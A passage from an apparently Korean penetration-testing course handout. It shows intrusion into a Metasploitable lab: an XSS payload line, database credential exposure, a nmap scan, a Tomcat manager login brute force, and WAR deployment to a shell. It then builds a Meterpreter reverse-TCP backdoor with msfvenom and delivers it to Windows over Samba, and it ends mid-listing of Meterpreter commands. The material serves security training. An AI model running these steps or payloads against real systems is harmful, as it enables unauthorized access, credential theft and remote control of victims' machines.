></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--
regards , securfrog
# milw0rm.com [2006-11-01]
# firefox &
-> http://192.168.10.134/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
-> 페이지 하단의 에러메세지 부분을 참고한다.
array(3) {
[0]=>
array(7) {
["file"]=>
string(35) "/var/www/tikiwiki/lib/tikidblib.php"
["line"]=>
int(84)
["function"]=>
string(9) "sql_error"
["class"]=>
string(6) "TikiDB"
["object"]=>
object(TikiLib)#6 (10) {
["db"]=>
object(ADODB_mysql)#2 (78) {
["databaseType"]=>
string(5) "mysql"
["dataProvider"]=>
string(5) "mysql"
["hasInsertID"]=>
bool(true)
["hasAffectedRows"]=>
bool(true)
["metaTablesSQL"]=>
string(11) "SHOW TABLES"
["metaColumnsSQL"]=>
string(20) "SHOW COLUMNS FROM %s"
["fmtTimeStamp"]=>
..... (중략) .....
["hasTransactions"]=>
bool(false)
["forceNewConnect"]=>
bool(false)
["poorAffectedRows"]=>
bool(true)
["clientFlags"]=>
int(0)
["substr"]=>
string(9) "substring"
["nameQuote"]=>
string(1) "`"
["_genIDSQL"]=>
string(38) "update %s set id=LAST_INSERT_ID(id+1);"
["_genSeqSQL"]=>
string(33) "create table %s (id int not null)"
["_genSeq2SQL"]=>
string(26) "insert into %s values (%s)"
["_dropSeqSQL"]=>
string(13) "drop table %s"
["database"]=>
string(11) "tikiwiki195"
["host"]=>
string(9) "localhost"
["user"]=>
string(4) "root"
["password"]=>
string(0) ""
["debug"]=>
bool(false)
["maxblobsize"]=>
int(262144)
["concat_operator"]=>
string(1) "+"
["length"]=>
string(6) "length"
["random"]=>
string(6) "rand()"
..... (중략) .....
④ MySQL에 접근하여 정보를 확인해 보자.
# ssh msfadmin@192.168.10.134
msfadmin@192.168.10.134's password: (msfadmin)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Thu Jul 17 21:50:01 2014
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
$ mysql -u root -p
Enter password: <ENTER> <---- 암호는 없다.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
mysql> use tikiwiki195
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+------------------------------------+
| Tables_in_tikiwiki195 |
+------------------------------------+
| galaxia_activities |
| galaxia_activity_roles |
| galaxia_instance_activities |
| galaxia_instance_comments |
| galaxia_instances |
..... (중략) .....
| tiki_userpoints |
| tiki_users |
| tiki_users_score |
| tiki_webmail_contacts |
| tiki_webmail_messages |
| tiki_wiki_attachments |
| tiki_zones |
| users_grouppermissions |
| users_groups |
| users_objectpermissions |
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.00 sec)
mysql> select * from users_users;
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| userId | email | login | password | provpass | default_group | lastLogin | currentLogin | registrationDate | challenge | pass_due | hash | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score |
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| 1 | | admin | admin | NULL | NULL | NULL | NULL | NULL | NULL | NULL | f6fdffe48c908deb0f4c3bd36c032e72 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 |
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
1 row in set (0.00 sec)
mysql> quit
-> admin/admin 정보 확인
$ exit
#
# firefox &
-> http://192.168.10.134/tikiwiki/tiki-index.php
-> 왼쪽 메뉴에 'Backups'가 존재한다.
-> 하단에 'upload a backup' 부분의 '파일선택', 'upload'를 통해 파일업로드 취약점을 테스트 할
수 있다. (이 부분은 개별적으로 테스트 하기 바란다.)
[실습] 칼리 리눅스 사용하기 3
● 메타스플로잇을 사용하여 톰캣의 취약점을 공격해 보자.
● Tomcat V5 관리자 페이지에서 기본으로 사용되는 몇가지 취약한 계정의 정보를 대입해 알아보는 tomcat_mgr_login 스캔 도구를 사용해 보자.
(Kali Linux)
① 타겟 시스템의 포트/서비스/버전을 확인
# nmap -sV -p 1-65535 192.168.10.134 /* metasploitable V2 Linux ip : 192.168.10.134 */
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-17 21:06 KST
Nmap scan report for 192.168.10.134
Host is up (0.00024s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42043/tcp open mountd 1-3 (RPC #100005)
48481/tcp open unknown
50478/tcp open status 1 (RPC #100024)
56189/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.23 seconds
-> 약간 시간이 걸림
# man nmap
-sV: Probe open ports to determine service/version info
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
② 기본 홈페이지(tomcat)에 접근
# firefox http://192.168.10.134:8180/
-> Apache Tomcat/5.5 버전이 설치 되어 있다.(기본 페이지의 왼쪽 상단 부분에 대한 정보 확인)
-> if 기본 설정만 되어 있다면 관리자 페이지에 접근이 가능하다.
# firefox http://192.168.10.134:8180/manager/html
-> 관리자 페이지의 아이디/패스워드 물어 보는 화면이 나올것이다.
-> 확인만 하고 접속을 해제 한다.
④ Tomcat 홈페이지의 관리자 페이지를 가지고 Dictionary Attack 수행
# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS
auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions
auxiliary/dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
exploit/multi/http/struts_dev_mode 2012-01-06 excellent Apache Struts 2 Developer Mode OGNL Execution
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution
post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration
post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(tomcat_mgr_login) > set rhosts 192.168.10.134
rhosts => 192.168.10.134
msf auxiliary(tomcat_mgr_login) > set rport 8180
rport => 8180
msf auxiliary(tomcat_mgr_login) > exploit
[*] 192.168.10.134:8180 TOMCAT_MGR - [01/55] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.10.134:8180 TOMCAT_MGR - [01/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.10.134:8180 TOMCAT_MGR - [02/55] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.10.134:8180 TOMCAT_MGR - [02/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.10.134:8180 TOMCAT_MGR - [03/55] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.10.134:8180 TOMCAT_MGR - [03/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
..... (중략) ....
[*] 192.168.10.134:8180 TOMCAT_MGR - [47/55] - Trying username:'tomcat' with password:'role1'
[-] 192.168.10.134:8180 TOMCAT_MGR - [47/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.10.134:8180 TOMCAT_MGR - [48/55] - Trying username:'tomcat' with password:'root'
[-] 192.168.10.134:8180 TOMCAT_MGR - [48/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.10.134:8180 TOMCAT_MGR - [49/55] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.10.134:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.10.134:8180 TOMCAT_MGR - [50/55] - Trying username:'both' with password:'admin'
[-] 192.168.10.134:8180 TOMCAT_MGR - [50/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [51/55] - Trying username:'both' with password:'manager'
[-] 192.168.10.134:8180 TOMCAT_MGR - [51/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [52/55] - Trying username:'both' with password:'role1'
[-] 192.168.10.134:8180 TOMCAT_MGR - [52/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [53/55] - Trying username:'both' with password:'root'
[-] 192.168.10.134:8180 TOMCAT_MGR - [53/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [54/55] - Trying username:'both' with password:'tomcat'
[-] 192.168.10.134:8180 TOMCAT_MGR - [54/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [55/55] - Trying username:'both' with password:'s3cret'
[-] 192.168.10.134:8180 TOMCAT_MGR - [55/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
-> [+] 되어 있으면 성공한 것이다.
⑤ 관리자 페이지로 접속
# firefox http://192.168.10.134:8180/manager/html
-> 아이디 : tomcat
-> 패스워드 : tomcat
-> 접속후 하단에 war 파일을 업로드 할 수 있는 기능을 확인
--------------------------------------------------------------------------------
......
---------------------------------------------------------
WAR file to deploy
---------------------------------------------------------
Select WAR file to upload [Browser] No file selected.
[Deploy]
--------------------------------------------------------------------------------
-> Tomcat를 기본 설치를 하면 '파일 업로드 취약점'이 생긴다.
-> 이 취약점을 통해 악성코드가 포함된 war 파일을 이용해 시스템에 침투할 수 있다.
⑥ 메타스플로잇의 자동 악성 코드 업로드 공격 사용
# msfconsole
msf auxiliary(tomcat_mgr_login) > search tomcat
..... (중략) .....
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
exploit/multi/http/struts_dev_mode 2012-01-06 excellent Apache Struts 2 Developer Mode OGNL Execution
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution
post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration
msf auxiliary(tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
sf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and
/undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > set password tomcat
password => tomcat
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.10.134
rhost => 192.168.10.134
msf exploit(tomcat_mgr_deploy) > set rport 8180
rport => 8180
msf exploit(tomcat_mgr_deploy) > set username tomcat
username => tomcat
msf exploit(tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf exploit(tomcat_mgr_deploy) > set payload java/shell/bind_tcp
payload => java/shell/bind_tcp
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and
/undeploy will be used)
Proxies no Use a proxy chain
RHOST 192.168.10.134 yes The target address
RPORT 8180 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (java/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.10.134 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6456 bytes as TZbEqMlwvWhjXx2vZyMI2tdANFMx.war ...
[*] Executing /TZbEqMlwvWhjXx2vZyMI2tdANFMx/FDDKrkqE4OadJgJF4h6N.jsp...
[*] Undeploying TZbEqMlwvWhjXx2vZyMI2tdANFMx ...
[*] Sending stage (2976 bytes) to 192.168.10.134
[*] Command shell session 1 opened (192.168.10.50:33731 -> 192.168.10.134:4444) at
2014-07-18 14:09:52 +0900
dir
bin dev initrd lost+found nohup.out root sys var
boot etc initrd.img media opt sbin tmp vmlinuz
cdrom home lib mnt proc srv usr
cat /etc/passwd
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
..... (중략) .....
exit
[*] 192.168.10.134 - Command shell session 1 closed. Reason: Died from EOFError
<ENTER>
msf exploit(tomcat_mgr_deploy) > quit
-> 따라서, 오픈소스 WAS로 운영중인 시스템은 정기적으로 공개되는 취약점에 대한 관심을 가져야 한다.
-> 여러가지 CMD를 수행해 본다.
[실습] 타겟 시스템을 선정한다.
[실습] 정보를 모은다.
[실습] 취약점이 있는지 확인한다.
[실습] 공격의 여지가 있는지 봐서 필요하다면 공격한다.
[실습] 공격 성공이 되었다면 문서화 한다.
[실습] 칼리 리눅스 사용하기 4
메터프리터(Meterpreter)
● 루비(Ruby) 기반의 스크립트를 통해 취약점을 이용하여 대상 시스템에 침투한 후 간단한 명령어를 이용해 시스템의 정보를 획득할 수 있는 기능이다.
● 메타스플로잇에서 지원하는 라이브러리를 이용하기 때문에 어떤 방법을 이용해서 정보를 획득할 것인지에 대한 아이디어만 있다면 좋은 기능을 개발할 수 있다.
● (전제조건) 메터프리터는 대상 서버에 침투가 이루어졌다는 가정하에 수행되는 것이기 때문에 여로가지 방법(EX: 톰캣 취약점)이 선행적으로 수행해야 한다.
리소스(Resource) 파일로 시스템 침투 환경 만들기
● 취약점을 통해 침투를 통해 환경 만들기
● 취약점을 통해 침투한 후 백도어(Backdoor, 악성코드)를 통해 환경 만들기
수업에서는 시스템 침투 환경을 만들기 위해 백도어를 이용하여 테스트 환경을 만드는 실습을 진행한다.
■ 실습 시스템
- KaliLinux
- Windows 7
① 백도어 만들기
(Kali Linux)
# ifconfig | grep inet
inet addr:192.168.10.50 Bcast:192.168.10.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe13:974a/64 Scope:Link
inet addr:192.168.20.50 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe13:9754/64 Scope:Link
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
# mkdir -p /root/bin
# cd /root/bin
# vi reverse_resource.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.20.50
set ExitSession false
exploit -j -z
-> LHOST 부분에는 자신의 IP를 입력한다.
② 페이로드(Payload)를 사용하여 공격 코드 자동 생성
[참고] msfvenom CMD 사용법
# msfvenom
-v, --var-name <name> Specify a custom variable name to use for certain output formats
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-o, --out <path> Save the payload
# msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.20.50 LPORT=4444 \
-f exe \
-o reverse_test.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Saved as: reverse_test.exe
-> LHOST에는 192.168.10.50 공격자의 IP 입력한다.
-> 생성된 reverse_test.ex 파일이 대상 시스템에서 실행하면 공격 시스템은 대상 시스템에 침투한 것과 동일한 환경이 된다.
# ls
reverse_resource.rc reverse_test.exe
reverse_resource.rc (KaliLinux) msfconsole CMD
reverse_test.exe (Windows 7) Backdoor
# file *
reverse_resource.rc: ASCII text
reverse_test.exe: PE32+ executable (GUI) x86-64, for MS Windows
③ 대상 시스템(windows7)에 reverse_test.exe 파일을 복사
(가정) 여러가지 방법을 통해 reverse_test.exe 파일을 대상 PC(windows7)에 복사했다고 가정한다.
■ SAMBA(http://www.samba.org)
Windows : CIFS/SMB
Linux/Unix : NFS
(KaliLinux) samba 서버를 통해 /share 디렉토리를 공유한다.
(windows 7) 공유 디렉토리에 접속한다.(\\192.168.20.50)
(KaliLinux)
# mkdir /share
# chmod 777 /share
# cp reverse_test.exe /share
# vi /etc/samba/smb.conf
..... (중략) .....
# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
comment = Printer Drivers
path = /var/lib/samba/printers
browseable = yes
read only = yes
guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
; write list = root, @lpadmin
[share]
comment = Kali Linux Shared Directory
path = /share
browseable = yes
read only = no
writable = yes
public = yes
-> 문서의 가장 하단에 새로운 내용을 입력한다.
# service smbd status
● smbd.service - LSB: start Samba SMB/CIFS daemon (smbd)
Loaded: loaded (/etc/init.d/smbd)
Active: inactive (dead)
# service smbd start
# service smbd status
● smbd.service - LSB: start Samba SMB/CIFS daemon (smbd)
Loaded: loaded (/etc/init.d/smbd)
Active: active (running) since 수 2015-11-04 12:04:45 KST; 4s ago
Process: 7310 ExecStart=/etc/init.d/smbd start (code=exited, status=0/SUCCESS)
CGroup: /system.slice/smbd.service
├─7319 /usr/sbin/smbd -D
└─7321 /usr/sbin/smbd -D
11월 04 12:04:45 kali smbd[7310]: Starting SMB/CIFS daemon: smbd.
nmbd daemon : NetBIOS 지원
smbd daemon : SMB 지원
# smbclient -L localhost -N
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.0.6-Debian]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share Disk Kali Linux Share Directory
IPC$ IPC IPC Service (Samba 4.0.6-Debian)
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 4.0.6-Debian]
Server Comment
--------- -------
KALI Samba 4.0.6-Debian
SOLDESK-PC
Workgroup Master
--------- -------
WORKGROUP
(windows7)
공유 디렉토리에 접속하여 파일을 로컬로 복사한다.
\\192.168.20.50\share\resource_test.exe ---> 바탕화면으로 복사
(KaliLinux)
# cd /root/bin
# msfconsole -r reverse_resource.rc
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
[*] Processing reverse_resource.rc for ERB directives.
resource (reverse_resource.rc)> use exploit/multi/handler
resource (reverse_resource.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (reverse_resource.rc)> set LHOST 192.168.20.50
LHOST => 192.168.20.50
resource (reverse_resource.rc)> set ExitSession false
ExitSession => false
resource (reverse_resource.rc)> exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.50:4444
[*] Starting the payload handler...
msf exploit(handler) >
-> window7 에서 reverse_test.exe 파일이 실행될때 까지 기다린다.
(windows7)
reverse_test.exe 프로그램을 실행한다.
(KaliLinux)
KaliLinux에서 메세지 확인
[*] Sending stage (770048 bytes) to 192.168.20.202
[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49169) at
2014-07-20 16:41:39 +0900
[deprecated] I18n.enforce_available_locales will default to true in the future. If you really want to skip validation of your locale you can set I18n.enforce_available_locales =
false to avoid this message.
<ENTER>
msf exploit(handler) > sessions -i
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 soldesk-PC\soldesk @ SOLDESK-PC 192.168.20.50:4444 ->
192.168.20.202:49175 (192.168.20.202)
msf exploit(handler) > sessions -i 1 /* 1은 세션 번호이다. */
[*] Starting interaction with 1...
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
